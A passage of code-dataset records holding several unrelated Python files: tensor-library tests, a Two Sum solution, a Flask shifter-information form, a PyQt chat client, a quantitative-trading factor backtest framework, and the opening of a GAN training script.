word_vectors), axis=0)\n word_vocab = Vocab(words=words)\n print(f'word vocab length: {len(word_vocab)}')\n print([word_vocab[i] for i in range(5)])\n print(f'word vectors shape: {word_vectors.shape}')\n\n\n# test softmax\ndef test_softmax():\n data = np.random.rand(5, 2)\n x_gpu = Tensor(data=data, device='cuda')\n x_cpu = Tensor(data=data, device='cpu')\n\n print(x_gpu.softmax())\n print(x_cpu.softmax())\n\n\n# test dropout\ndef test_dropout():\n data = np.random.rand(10, 10)\n x_gpu = Tensor(data=data, device='cuda')\n x_dropout = x_gpu.dropout(0.1).cpu()\n print(x_gpu)\n print(x_dropout)\n print(x_dropout.shape)\n print(np.sum(x_dropout.data == 0))\n\n\ndef test_relu():\n data = np.random.rand(10, 10) - 0.5\n x_gpu = Tensor(data, device='cuda')\n x_cpu = Tensor(data, device='cpu')\n x_relu = x_gpu.relu()\n print(x_relu)\n print(x_relu.relu_grad())\n print(np.sum(np.sum(x_relu.cpu().data == 0)))\n\n # print(x_gpu.tanh())\n # print((np.exp(data) - np.exp(-data))/(np.exp(data) + np.exp(-data)))\n\n # print(x_gpu.sigmoid())\n # print(1/(1 + np.exp(-data)))\n\n # print(x_gpu.sigmoid_grad())\n # print(data * (1 - data))\n\n\ndef test_expand():\n data = np.array([1, 2, 3])\n x_gpu = Tensor(data, device='cuda')\n x_cpu = Tensor(data, device='cpu')\n print(x_gpu.expand(dim=0, copies=5))\n print(x_cpu.expand(dim=0, copies=5))\n print('norm', x_gpu.norm())\n\n\ndef test_gpu_vs_cpu():\n vectors = np.random.normal(0, 1, size=(20, 8)) * (2/28) ** 0.5\n vectors[0, :] = 
0\n\n    embedding_gpu = Embedding.from_pretrained(\n        vectors=vectors,\n        padding_index=0,\n        device='cuda',\n        autograd=True,\n    )\n\n    embedding_cpu = Embedding.from_pretrained(\n        vectors=vectors,\n        padding_index=0,\n        device='cpu',\n        autograd=True,\n    )\n\n    indices = Tensor([[0, 1, 0, 4, 5],\n                      [1, 4, 0, 1, 2]], device='cpu', d_type=np.int32)\n    embeds_gpu = embedding_gpu(indices)\n    embeds_cpu = embedding_cpu(indices)\n\n    linear_cpu = Linear(8, 2, device='cpu', bias=True)\n    linear_gpu = Linear(8, 2, device='cuda', bias=True)\n    linear_gpu.weight = linear_cpu.weight.to('cuda')\n    linear_gpu.bias = linear_cpu.bias.to('cuda')\n    # print(embeds_gpu[0].shape)\n\n    out_cpu = linear_cpu(embeds_cpu[0])\n    out_gpu = linear_gpu(embeds_gpu[0])\n    # print(out_cpu)\n    # print(out_gpu)\n\n    target = Tensor([1, 0, 1, 0, 0], device='cpu', d_type=np.int32)\n    loss_gpu = out_gpu.cross_entropy(target)\n    loss_cpu = out_cpu.cross_entropy(target)\n    print(loss_cpu, loss_gpu)\n    loss_gpu.backward()\n    loss_cpu.backward()\n\n    print(linear_gpu.weight.grad)\n    print(linear_cpu.weight.grad)\n\n    print(embedding_gpu.weight.grad)\n    print(embedding_cpu.weight.grad)\n\n\ndef test_index_select_v2():\n    x_cpu = np.random.rand(8, 5)\n    x = Tensor(x_cpu, device='cuda', autograd=True)\n    indices = Tensor([[1, 2, 3], [0, 0, 0]], device='cuda', d_type=np.int32)\n    embs = x.index_selectv2(indices)\n    print(x)\n    print(embs)\n    # print(x_cpu[[1, 2, 3]])\n\n\nif __name__ == '__main__':\n    # test basic op\n    # x = Tensor([1, 2, 3], device='cuda', autograd=True)\n    # y = Tensor([4, 5, 6], device='cuda', autograd=True)\n    # test_basic_ops(x, y)\n\n    # test backward\n    # test_backward()\n\n    # test index select\n    # test_index_select()\n\n    # test get item\n    # test_get_item()\n\n    # test mm graph\n    # test_mm_graph()\n\n    # test lstm cell\n    # test_lstm_cell()\n\n    # test lstm layer\n    # test_lstm_layer()\n\n    # test build model\n    # test_build_model()\n\n    # test vocab\n    # test_vocab()\n\n    # test softmax\n    # test_softmax()\n\n    # test dropout\n    test_dropout()\n\n    # test relu\n    # test_relu()\n\n    # test expand\n    # test_expand()\n\n    # test_gpu_vs_cpu()\n\n    # test_index_select_v2()\n","sub_path":"test_tensor_new.py","file_name":"test_tensor_new.py","file_ext":"py","file_size_in_byte":12267,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"}
+{"seq_id":"498998515","text":"# -*- coding: utf-8 -*-\n\"\"\"\n---------------------------- \n    @Time : 2018/11/23 14:16\n    @Author : Mr.Guo\n    @Site : https://github.com/stevenguo1995\n    @File : 01_two_sum.py\n    @Software: PyCharm\n---------------------------- \n\nProblem\n----\n01 Two Sum\nGiven an array of integers and a target value, find the two numbers in the array that add up to the target.\nYou may assume that each input has exactly one solution, and the same element may not be used twice.\n----------------------------\nExample\n----\nGiven nums = [2, 7, 11, 15], target = 9\n\nBecause nums[0] + nums[1] = 2 + 7 = 9\nreturn [0, 1]\n----------------------------\n\"\"\"\n\n\nclass Solution:\n    def twoSum(self, nums, target):\n        \"\"\"\n        :type nums: List[int]\n        :type target: int\n        :rtype: List[int]\n        \"\"\"\n        # Method 1: brute force, two passes over the array\n        # l = len(nums)\n        # for i in range(l - 1):\n        #     for j in range(i + 1,l):\n        #         if nums[i] + nums[j] == target:\n        #             return i, j\n\n        # Method 2: one pass over the array\n        for i in range(len(nums)):\n            if target - nums[i] in nums[i + 1:]:\n                print(nums[i + 1:])\n                return i, nums[i + 1:].index(target - nums[i]) + i + 1\n\n        # Method 3: dictionary (hash map)\n        # d = {}\n        # for i, num in enumerate(nums):\n        #     print(i,num)\n        #     if target - num in d:\n        #         return [d[target - num], i]\n        #     d[num] = i\n\n\nif __name__ == \"__main__\":\n    n = [3, 2, 4, 11, 15]\n    t = 6\n    s = Solution()\n    print(s.twoSum(n, 
t))\n","sub_path":"01_two_sum.py","file_name":"01_two_sum.py","file_ext":"py","file_size_in_byte":1554,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"404135091","text":"import psycopg2\nfrom .db import engine\nfrom .views import app\nfrom wtforms import Form, StringField, SelectField, validators\nfrom wtforms.fields.html5 import EmailField\nfrom wtforms.validators import ValidationError\n\nVALID_COUNTRIES = [\n ('',''), # Optional empty choice\n ('usa', 'USA'),\n ('canada', 'Canada'),\n ('portugal', 'Portugal'),\n ('uk', 'UK'),\n ('germany', 'Germany'),\n ('mexico', 'Mexico')\n]\nFORM_KEYS = ['firstname', 'lastname', 'expert', 'email', 'phone', 'country']\n\nclass ShifterInfoForm(Form):\n def validate_phone(form, field):\n if len(field.data) != 11 and len(field.data) != 12:\n raise ValidationError(\"Phone number wrong length\")\n if field.data and not str(field.data).isdigit():\n raise ValidationError(\"Phone number must contain only digits\")\n\n firstname = StringField('First Name', [validators.DataRequired()])\n lastname = StringField('Last Name', [validators.DataRequired()])\n expert = SelectField('Expert', choices=[])\n email = EmailField('Email', [validators.Optional(), validators.Email()])\n phone = StringField('Phone', [validators.Optional()])\n country = SelectField('Country', choices=VALID_COUNTRIES)\n\ndef get_experts():\n \"\"\"\n Returns a list of the names of all on-call experts.\n \"\"\"\n conn = engine.connect()\n result = conn.execute(\"SELECT firstname, lastname FROM experts\")\n row = result.fetchall()\n names = []\n for first, last in row:\n name = first + \" \" + last\n names.append((name, name))\n\n return names\n\ndef get_shifter_information():\n \"\"\"\n Get some of the information about the current shifter.\n\n Returns the first/last name of the current shifter and the first name of\n the on-call expert.\n \"\"\"\n conn = engine.connect()\n\n result = conn.execute(\"SELECT firstname, lastname, email, phonenumber, expert \"\n \"FROM current_shifter_information\")\n\n row = result.fetchone()\n if row is None:\n return None, None, None\n\n email = row[2]\n phone = row[3]\n\n if len(email) and len(phone):\n updates = \"Receiving both email and text alerts.\"\n elif len(email):\n updates = \"Receiving only email alerts.\"\n elif len(phone):\n updates = \"Receiving only text alerts.\"\n else:\n updates = \"Receiving neither text or email alerts.\"\n\n shifter = \"\"\n expert = \"\"\n\n shifter_firstname = row[0]\n shifter_lastname = row[1]\n if shifter_firstname and shifter_lastname:\n shifter = \"Current shifter: %s %s\" % \\\n (shifter_firstname.capitalize(), shifter_lastname.capitalize())\n\n expert_name = row[4]\n if expert_name:\n first = expert_name.split()[0]\n last = expert_name.split()[1]\n expert = \"Current expert: %s %s\" % (first, last)\n\n return shifter, expert, updates\n\ndef set_shifter_information(form):\n \"\"\"\n Update the database with the current shift information.\n \"\"\"\n conn = psycopg2.connect(dbname=app.config['DB_NAME'],\n user=app.config['DB_OPERATOR'],\n host=app.config['DB_HOST'],\n password=app.config['DB_OPERATOR_PASS'])\n conn.set_isolation_level(psycopg2.extensions.ISOLATION_LEVEL_AUTOCOMMIT)\n\n cursor = conn.cursor()\n\n result = cursor.execute(\"INSERT INTO shifter_information (firstname, \"\n \"lastname, phonenumber, email, country, expert) \"\n \"VALUES (%(firstname)s, %(lastname)s, %(phone)s, \"\n \"%(email)s, %(country)s, %(expert)s)\", 
form.data)\n","sub_path":"minard/shifter_information.py","file_name":"shifter_information.py","file_ext":"py","file_size_in_byte":3589,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"}
+{"seq_id":"309947300","text":"from PyQt5 import QtWidgets, QtCore\nfrom clientui import Ui_MainWindow\nimport requests, datetime\n\n\nclass App(QtWidgets.QMainWindow, Ui_MainWindow):\n    def __init__(self):\n        super().__init__()\n        self.setupUi(self)\n        self.SendButton.pressed.connect(self.send_button_click_handler)\n        self.last_timestamp = 0\n        self.timer = QtCore.QTimer()\n        self.timer.timeout.connect(self.time_handler)\n        self.timer.start(1000)\n\n    def send_button_click_handler(self):\n        username = self.LoginEdit.text()\n        password = self.PasswordEdit.text()\n        message = self.textEdit.toPlainText()\n        self.textEdit.clear()\n\n        requests.get(\n            \"http://127.0.0.1:5000/send_message\",\n            json={\n                \"username\": username,\n                \"password\": password,\n                \"text\": message\n            }\n        )\n\n    def time_handler(self):\n        messages = requests.get(\n            \"http://127.0.0.1:5000/get_messages\",\n            params={\"after\": self.last_timestamp}\n        ).json()['messages']\n        for message in messages:\n            dt = datetime.datetime.fromtimestamp(message[\"timestamp\"])\n            dt = dt.strftime(\"%H:%M %d-%m\")\n            self.textBrowser.append(dt + \" \"+message[\"username\"])\n            self.textBrowser.append(message[\"text\"] + \"\\n\")\n            self.last_timestamp = message[\"timestamp\"]\n\n\napp = QtWidgets.QApplication([])\nwindow = App()\nwindow.show()\napp.exec_()","sub_path":"messenger.py","file_name":"messenger.py","file_ext":"py","file_size_in_byte":1474,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"}
+{"seq_id":"278047217","text":"import time\nimport pickle\nimport warnings\nimport datetime\nimport numpy as np\nimport pandas as pd\nimport pyecharts\nfrom pyecharts import options as opts\nfrom pyecharts.charts import Line, Bar\n\nimport matplotlib\nimport matplotlib.pyplot as plt\nfrom multiprocessing.dummy import Pool as ThreadPool\n\nwarnings.filterwarnings('ignore')\n\nmatplotlib.rcParams['font.sans-serif'] = ['SimHei']\nmatplotlib.rcParams['font.family'] = 'sans-serif'\nmatplotlib.rcParams['axes.unicode_minus'] = False\n\n\nclass PreProcessing(object):\n\n    def __init__(self):\n        self.stock = None\n        self.addition_counts = 100\n        self.max_quantile_thres = 0.85\n        self.min_quantile_thres = 0.15\n        self.quantile_thres_list = [0.075, 0.425, 0.575, 0.925]\n        # normalize with the mid-term (recent-days) data, i.e. use the mean and\n        # std of the mid-term window\n        self.past_data = None\n        self.unwash_past_data = None\n        self.past_mean = None\n        self.past_std = None\n        # median computed from the mid-term data\n        self.past_median = None\n        # open/close factor quantile thresholds computed from the mid-term data\n        self.thres_list = None\n        # mid-term data\n        self.past_factor_data = None\n\n    def reset_quantile_thres(self, min_quantile_thres, max_quantile_thres):\n        \"\"\"\n        Set the lower/upper quantile bounds.\n        :param max_quantile_thres: upper quantile bound\n        :param min_quantile_thres: lower quantile bound\n        :return:\n        \"\"\"\n        self.max_quantile_thres = max_quantile_thres\n        self.min_quantile_thres = min_quantile_thres\n        return\n\n    def reset_quantile_list(self, quantile_list):\n        self.quantile_thres_list = quantile_list\n        return\n
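\n    # editor's note (inferred from back_test below, not in the original file):\n    # the four quantiles map to trading thresholds as\n    #   thres_list[3] -> open long,  thres_list[1] -> close long,\n    #   thres_list[0] -> open short, thres_list[2] -> close short\n    # e.g. pre.reset_quantile_list([0.05, 0.45, 0.55, 0.95]) would widen the\n    # open bands ('pre' being a hypothetical PreProcessing instance).\n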
计算过去数据的均值、标准差、中位数,最新的和历史的清洗均以该计算的结果为依据\n self.past_mean = self.past_factor_data.mean()\n self.past_std = self.past_factor_data.std()\n self.past_median = self.past_factor_data.quantile(0.5)\n # 对过去的数据进行去极值、标准化\n if extreme:\n past_factor_data = self.filter_extreme_data(self.past_factor_data, method='sigma')\n else:\n past_factor_data = self.past_factor_data\n if standarlize:\n past_factor_data = self.standardize_data(past_factor_data)\n else:\n past_factor_data = self.past_factor_data\n # 开平仓阈值(因子完全确立时设定,如果对过去的因子进行去极值标准化,那么新的数据需要同样的操作)\n # self.thres_list = abs(past_factor_data).quantile([self.min_quantile_thres, self.max_quantile_thres]).values\n self.thres_list = past_factor_data.quantile(self.quantile_thres_list).values\n print('开/平仓阈值:', self.thres_list)\n return\n\n def get_factor(self, data):\n \"\"\"\n # 构造因子的函数,需要在后续重构\n \"\"\"\n return data\n\n def standardize_data(self, data):\n \"\"\"\n # 对数据标准化,用过去一段时间的数据的均值和方差进行标准化\n \"\"\"\n return (data - self.past_mean) / self.past_std\n\n def filter_extreme_data(self, data, method=None, n=3, min_thres=0.025, max_thres=0.975):\n \"\"\"\n # 去极值,用过去一段时间的数据的均值、方差、分位数和中位数等等进行标准化\n \"\"\"\n if method == 'percentile':\n quatile_min, quantile_max = self.past_factor_data.quantile([min_thres, max_thres])\n return np.clip(data, quatile_min, quantile_max)\n\n elif method == 'sigma':\n mean = self.past_mean\n std = self.past_std\n max_range = mean + n * std\n min_range = mean - n * std\n return np.clip(data, min_range, max_range)\n\n elif method == 'median':\n new_median = ((data - self.past_median).abs()).quantile(0.5)\n max_range = self.past_median + n * new_median\n min_range = self.past_median - n * new_median\n return np.clip(data, min_range, max_range)\n\n\nclass FactorStatistics(PreProcessing):\n\n def __init__(self):\n super(FactorStatistics, self).__init__()\n # 数据\n # self.stock = None\n # 因子统计指标\n self.std = 0.0 # 因子均值\n self.mean = 0.0 # 因子方差\n self.y_mid_5_corr = 0.0 # 因子值与5个tick之后的收益率两个时间序列的相关系数\n # (因子值为正做多,反之做空) 需要注意的是,因子的平均值在0附近较好,因为需要多空是均衡的\n self.y_mid_5_mean = 0.0 # 代表因子值绝对值大于0.85分位的值的未来5tick收益的平均值\n self.y_mid_10_corr = 0.0 # 因子值与10个tick之后的收益率两个时间序列的相关系数\n self.y_mid_10_mean = 0.0 # 代表因子值绝对值大于0.85分位的值的未来10tick收益的平均值\n self.y_mid_30_corr = 0.0 # 因子值与30个tick之后的收益率两个时间序列的相关系数\n self.y_mid_30_mean = 0.0 # 代表因子值绝对值大于0.85分位的值的未来30tick收益的平均值\n self.statistics_series = None # 上述因子统计指标的series\n # 因子回测指标\n self.hold_periods = None # 单笔持仓时间\n self.single_rts = 0.0 # 单笔收益\n self.pct_change = 0.0 # 单笔收益率\n self.trade_counts = 0 # 交易次数\n self.win_rate = 0.0 # 胜率\n self.win_rate_large = 0.0 # 非亏损胜率\n self.score = 0.0 # max(每笔净利润,0)*pow(min(40,平均交易次数), 0.5)\n self.records_series = None\n # 交易信息\n self.records = None # 交易记录\n # 最新测试数据\n self.data = None\n # 详细的收益表\n self.detail_rts = None\n\n def set_new_data(self, extreme=True, standarlize=True):\n \"\"\"\n 获取数据,并计算因子值, 根据需要进行去极值和标准化\n df: 最新的数据\n \"\"\"\n # 需要拼一段过去的数据(其中中期尾部的数据[]和当前日期的数据必须是清洗过后的)\n self.data = pd.concat([self.past_data.tail(self.addition_counts), self.data], axis=0)\n self.data = self.get_factor(self.data)\n\n if extreme:\n self.data['factor'] = self.filter_extreme_data(self.data['factor'], method='sigma')\n if standarlize:\n self.data['factor'] = self.standardize_data(self.data['factor'])\n\n return\n\n def get_factor(self, data):\n \"\"\"\n # 构造因子,需要子在后续重构\n \"\"\"\n return data\n\n def back_test(self):\n \"\"\"\n # 回测\n \"\"\"\n # 阈值定义:对全部因子值(记为f)求绝对值后取分位数,定义0.85分位数为开仓阈值,记为a;定义0.15分位数为平仓阈值,记为b。\n # 开仓:f>a时开多头,f<-a的时候开空头。\n # 平仓:仓位为多头,当f<-b时平仓。 仓位为空头,当f>b时平仓。\n self.data = 
self.data[self.addition_counts:]\n # self.data['factor'] = self.data['factor'] - 1\n df = self.data.copy()\n df.to_excel(r'./数据/{}_new_data.xlsx'.format(self.stock))\n # open_buy_thres = self.thres_list[1]\n # close_buy_thres = -self.thres_list[0]\n # open_sell_thres = -self.thres_list[1]\n # close_sell_thrs = self.thres_list[0]\n open_buy_thres = self.thres_list[3]\n close_buy_thres = self.thres_list[1]\n open_sell_thres = self.thres_list[0]\n close_sell_thrs = self.thres_list[2]\n df['status'] = df['factor'].apply(lambda x: 2 if x > open_buy_thres else\n 1 if x > close_sell_thrs else\n -2 if x < open_sell_thres else\n -1 if x < close_buy_thres else np.NaN)\n df['status'].fillna(method='pad', axis=0, inplace=True)\n df_iterrow = df.loc[(df['status'] == 2) | (df['status'] == -2)]\n print('信号次数', len(df_iterrow))\n trade_records_dict = {}\n # 交易价格按照快照的收盘价进行取值\n while len(df_iterrow) != 0:\n try:\n # 交易时间\n _time = df_iterrow['date'].iloc[0]\n _price = df_iterrow['close'].iloc[0]\n if df_iterrow['status'].iloc[0] == 2:\n _side = 1\n else:\n _side = 2\n if _side == 1:\n _side2 = 2\n # 第一笔交易是多,第二笔平多\n _df = df.loc[(df['status'] < 0) & (df['date'] > _time)]\n _time2 = _df['date'].iloc[0]\n _price2 = _df['close'].iloc[0]\n _single_rts = _price2 - _price\n _pct_change = _price2 / _price - 1\n else:\n _side2 = 1\n _df = df.loc[(df['status'] > 0) & (df['date'] > _time)]\n _time2 = _df['date'].iloc[0]\n _price2 = _df['close'].iloc[0]\n _single_rts = _price - _price2\n _pct_change = _price / _price2 - 1\n df_iterrow = df_iterrow[df_iterrow['date'] > _time2]\n _hold_periods = (datetime.datetime.strptime(_time2, '%Y-%m-%d %H:%M:%S') -\n datetime.datetime.strptime(_time, '%Y-%m-%d %H:%M:%S')).seconds\n\n trade_records_dict[_time] = [_time, _side, _price,\n _time2, _side2, _price2,\n _single_rts, _pct_change, _hold_periods]\n except:\n break\n\n trade_records_df = pd.DataFrame(trade_records_dict, index=['开仓时间', '开仓方向', '开仓价格',\n '平仓时间', '平仓方向', '平仓价格',\n '单笔盈亏', '单笔收益率', '持仓时间']).T\n self.records = trade_records_df\n return trade_records_df\n\n def calculate_statistics(self):\n \"\"\"\n # 计算因子统计指标\n \"\"\"\n self.data['abs_factor'] = abs(self.data['factor'])\n self.data['rts5'] = self.data['close'].shift(-5) / self.data['close'] - 1\n self.data['rts10'] = self.data['close'].shift(-10) / self.data['close'] - 1\n self.data['rts30'] = self.data['close'].shift(-30) / self.data['close'] - 1\n self.data.sort_values(by=['abs_factor'], ascending=True, inplace=True)\n # 计算因子值与未来N个tick的收益率的相关系数\n self.y_mid_5_corr = self.data[['factor', 'rts5']].corr().iloc[0, 1]\n self.y_mid_10_corr = self.data[['factor', 'rts10']].corr().iloc[0, 1]\n self.y_mid_30_corr = self.data[['factor', 'rts30']].corr().iloc[0, 1]\n # 因子值绝对值大于0.85分位的值的未来Ntick收益的平均值\n condition_df = self.data[self.data['abs_factor'] > self.data['abs_factor'].quantile([0.85]).values[0]]\n self.y_mid_5_mean = condition_df['rts5'].mean()\n self.y_mid_10_mean = condition_df['rts10'].mean()\n self.y_mid_30_mean = condition_df['rts30'].mean()\n # 计算因子均值和方差\n self.mean = self.data['factor'].mean()\n self.std = self.data['factor'].std()\n statistics_dict = {'y_mid_5_corr': self.y_mid_5_corr,\n 'y_mid_10_corr': self.y_mid_10_corr,\n 'y_mid_30_corr': self.y_mid_30_corr,\n 'y_mid_5_mean': self.y_mid_5_mean,\n 'y_mid_10_mean': self.y_mid_10_mean,\n 'y_mid_30_mean': self.y_mid_30_mean,\n 'std': self.std,\n 'mean': self.mean}\n self.statistics_series = pd.Series(statistics_dict)\n # statistics_series = pd.DataFrame(self.statistics_series, columns=['performance']).T\n 
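# Added note (illustrative): y_mid_N_corr is an information-coefficient style statistic, corr(factor_t, close_{t+N}/close_t - 1); the y_mid_N_mean fields check whether the strongest 15% of |factor| readings actually earn positive forward returns, i.e. whether extreme signals are tradable.\n        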
statistics_series = self.statistics_series\n # 展示因子统计指标\n # print('----------------- 因子统计指标 -----------------')\n return statistics_series\n\n def calculate_records(self):\n \"\"\"\n # 计算回测指标\n \"\"\"\n self.hold_periods = self.records['持仓时间'].mean()\n self.single_rts = self.records['单笔盈亏'].mean()\n self.pct_change = self.records['单笔收益率'].mean()\n self.trade_counts = len(self.records)\n self.win_rate = round(float(len(self.records[self.records['单笔收益率'] > 0]) / self.trade_counts), 4)\n self.win_rate_large = round(float(len(self.records[self.records['单笔收益率'] >= 0]) / self.trade_counts), 4)\n # 平台公式:max(每笔净利润,0)​*pow(min(40,平均交易次数), 0.5)\n # 实际显示的分数是:单笔收益*100*pow(min(40*10,平均交易次数), 0.5)\n self.score = max(self.single_rts, 0) * pow(min(40 * 10, self.trade_counts), 0.5) * 100\n # 计算最大回撤\n cumprod_pct_change = (self.records['单笔收益率'] + 1).cumprod()\n cummax_pct_change = cumprod_pct_change.cummax()\n max_down = round(abs((cumprod_pct_change - cummax_pct_change).min()), 4)\n records_dict = {'持仓周期(tick)': self.hold_periods / 3,\n '单笔收益': self.single_rts,\n '单笔收益率': self.pct_change,\n '交易次数/天/支': self.trade_counts,\n '盈利胜率': self.win_rate,\n '非亏损胜率': self.win_rate_large,\n '最大回撤': max_down,\n '得分': self.score}\n self.records_series = pd.Series(records_dict)\n # 展示回测指标\n # print('----------------- 因子回测指标 ----------------- ')\n # records_series = pd.DataFrame(self.records_series, columns=['performance']).T\n records_series = self.records_series\n return records_series\n\n def get_combine_trades(self):\n df = self.records\n df_open = df[['开仓时间', '开仓方向', '开仓价格']]\n df_close = df[['平仓时间', '平仓方向', '平仓价格']]\n df_open['status'] = df_open['开仓方向'].apply(lambda x: 2 if x < 2 else -2)\n df_close['status'] = df_close['平仓方向'].apply(lambda x: 1 if x < 2 else -1)\n df_open.columns = ['time', 'side', 'price', 'status']\n df_close.columns = ['time', 'side', 'price', 'status']\n df_comb = pd.concat([df_open, df_close], axis=0)\n df_comb.sort_values(['time'], ascending=True, inplace=True)\n df_comb.set_index('time', drop=True, inplace=True)\n\n return df_comb\n\n def get_detail_returns(self):\n # 获取收盘价序列\n df_close = self.data[['date', 'close']]\n df_close.set_index('date', inplace=True, drop=True)\n # 获取成交记录\n df_trade = self.get_combine_trades()\n df = pd.concat([df_close, df_trade[['status']]], axis=1)\n df.fillna(method='pad', inplace=True)\n df['rts_positive'] = df['close'] / df['close'].shift(1) - 1\n df['rts_negative'] = df['close'].shift(1) / df['close'] - 1\n df['status_shift'] = df['status'].shift(1)\n df['rts_last'] = list(map(lambda x, y, z: x if z == -2 else y if z == 2 else 0,\n df['rts_negative'].values,\n df['rts_positive'].values,\n df['status_shift'].values))\n df['累计收益率'] = (df['rts_last'] + 1).cumprod()\n self.detail_rts = df\n return df\n\n def show_pnl(self):\n \"\"\"\n # 收益曲线可视化\n \"\"\"\n _data = self.get_detail_returns()\n fig = plt.figure(figsize=(16, 8))\n ax = fig.add_subplot(111)\n ax.plot(_data.index.values, _data['累计收益率'].values, label='pnl', color='red')\n ax2 = ax.twinx()\n ax2.plot(_data.index.values, _data['close'].values, label='price')\n ax.set_xticks([_data.index.tolist()[i] for i in range(0, len(_data.index), 50)])\n ax.set_xticklabels(\n [_data.index.tolist()[i] for i in range(0, len(_data.index), 50)],\n rotation=30)\n ax2.set_xticks([_data.index.tolist()[i] for i in range(0, len(_data.index), 50)])\n ax2.set_xticklabels(\n [_data.index.tolist()[i] for i in range(0, len(_data.index), 50)],\n rotation=30)\n ax.set_title(u'收益曲线')\n ax.set_ylabel(r'累计收益')\n ax2.set_ylabel(r'价格')\n 
ax.set_xlabel(r'时间')\n ax.legend(loc='upper left')\n ax2.legend(loc='upper right')\n plt.show()\n return\n\n def show_pnl_pyecharted(self, isNoteBook=True):\n \"\"\"\n # 因子值和点位可视化\n \"\"\"\n _data = self.get_detail_returns()\n # print(_data)\n if isNoteBook:\n width = \"900px\"\n height = \"400px\"\n else:\n width = \"1800px\"\n height = \"800px\"\n\n def overlap_rts() -> Line:\n x = _data.index.tolist()\n line1 = (\n Line(init_opts=opts.InitOpts(width=width, height=height))\n .add_xaxis(x)\n .add_yaxis(\"累计收益\", _data['累计收益率'].values)\n .extend_axis(\n yaxis=opts.AxisOpts(\n name='价格',\n axislabel_opts=opts.LabelOpts(formatter=\"{value}\"),\n is_scale=True\n ))\n .set_series_opts(label_opts=opts.LabelOpts(is_show=False))\n .set_global_opts(\n toolbox_opts=opts.ToolboxOpts(is_show=True),\n title_opts=opts.TitleOpts(title=\"收益曲线\"), # 设定title\n yaxis_opts=opts.AxisOpts(\n name='累计收益',\n axislabel_opts=opts.LabelOpts(formatter=\"{value}\"), # 设定y轴标签\n is_scale=True\n ),\n xaxis_opts=opts.AxisOpts(\n interval=50,\n axislabel_opts=opts.LabelOpts(rotate=30, font_size=10) # 设定x轴标签\n ),\n datazoom_opts=opts.DataZoomOpts(is_show=True, range_start=20, range_end=60, pos_top='50'), # 缩放功能\n brush_opts=opts.BrushOpts(tool_box='polygon'),\n tooltip_opts=opts.TooltipOpts(is_show=True, trigger=\"axis\") # 设定光标\n )\n )\n\n line = Line().add_xaxis(x).add_yaxis(\"价格\", _data['close'].values, yaxis_index=1)\n line1.overlap(line)\n return line1\n\n if isNoteBook:\n return overlap_rts()\n else:\n overlap_rts().render('./收益/{}_收益曲线.html'.format(self.stock)) # 本地存档\n return\n\n def show_factor(self, isNoteBook=True):\n \"\"\"\n # 因子值和点位可视化\n \"\"\"\n df = self.data[['date', 'close', 'factor']]\n df_record = self.records.copy()\n for _, vals in df_record.iterrows():\n if vals['开仓方向'] == 2:\n df.loc[(df.date >= vals['开仓时间']) & (df.date <= vals['平仓时间']), '空头'] = 1\n else:\n df.loc[(df.date >= vals['开仓时间']) & (df.date <= vals['平仓时间']), '多头'] = 1\n try:\n df['空头'] = df['空头'] * df['close']\n except:\n df['空头'] = np.NaN\n try:\n df['多头'] = df['多头'] * df['close']\n except:\n df['多头'] = np.NaN\n df.loc[~((df['空头'].notna()) | (df['空头'].notna())), '空仓'] = 1\n df['空仓'] = df['空仓'] * df['close']\n df.set_index('date', inplace=True)\n df.sort_index(ascending=True, inplace=True)\n\n if isNoteBook:\n width = \"900px\"\n height = \"400px\"\n else:\n width = \"1800px\"\n height = \"800px\"\n\n def overlap_rts() -> Line:\n x = df.index.tolist()\n line1 = (\n Line(init_opts=opts.InitOpts(width=width, height=height))\n .add_xaxis(x)\n .add_yaxis(\"价格\", df['close'].values,\n is_symbol_show=False,\n is_connect_nones=False,\n color='orange') # lightskyblue\n .extend_axis(\n yaxis=opts.AxisOpts(\n name='因子值',\n axislabel_opts=opts.LabelOpts(formatter=\"{value}\"),\n is_scale=True\n )\n )\n .set_series_opts(label_opts=opts.LabelOpts(is_show=False))\n .set_global_opts(\n toolbox_opts=opts.ToolboxOpts(is_show=True),\n title_opts=opts.TitleOpts(title=\"入场点位图\"), # 设定title\n yaxis_opts=opts.AxisOpts(\n name='价格',\n axislabel_opts=opts.LabelOpts(formatter=\"{value}\"), # 设定y轴标签\n is_scale=True\n ),\n xaxis_opts=opts.AxisOpts(\n interval=50,\n axislabel_opts=opts.LabelOpts(rotate=30, font_size=10) # 设定x轴标签\n ),\n datazoom_opts=opts.DataZoomOpts(is_show=True, range_start=20, range_end=60, pos_top='50'), # 缩放功能\n brush_opts=opts.BrushOpts(tool_box='polygon'),\n tooltip_opts=opts.TooltipOpts(is_show=True, trigger=\"axis\") # 设定光标\n )\n )\n\n line2 = Line().add_xaxis(x).add_yaxis(\"持有多头\", df['多头'].values,\n yaxis_index=0,\n 
is_symbol_show=False,\n is_connect_nones=False,\n color='red')\n line3 = Line().add_xaxis(x).add_yaxis(\"持有空头\", df['空头'].values,\n yaxis_index=0,\n is_symbol_show=False,\n is_connect_nones=False,\n color='blue')\n line4 = Line().add_xaxis(x).add_yaxis(\"因子值\", df['factor'].values,\n yaxis_index=1,\n is_symbol_show=False,\n color='black')\n line1.overlap(line2).overlap(line3).overlap(line4)\n return line1\n\n if isNoteBook:\n return overlap_rts()\n else:\n overlap_rts().render('./入场/{}_入场点位图.html'.format(self.stock)) # 本地存档\n return\n\n def run(self):\n \"\"\"\n # 启动\n \"\"\"\n self.back_test()\n return self.calculate_statistics(), \\\n self.calculate_records(), \\\n self.show_pnl_pyecharted(False), \\\n self.show_factor(False)\n","sub_path":"tick/hft_frame.py","file_name":"hft_frame.py","file_ext":"py","file_size_in_byte":24078,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"37157332","text":"import torch\r\nimport torchvision\r\nimport torchvision.transforms as transforms\r\nT = transforms\r\n\r\nfrom model import Generator, Discriminator\r\nimport os\r\nimport datetime\r\nfrom torch import autograd\r\n\r\nos.environ[\"CUDA_VISIBLE_DEVICES\"] = \"0\"\r\n\r\ndef calc_gradient_penalty(netD, real_data, fake_data):\r\n # print \"real_data: \", real_data.size(), fake_data.size()\r\n BATCH_SIZE = real_data.size(0)\r\n alpha = torch.rand(BATCH_SIZE, 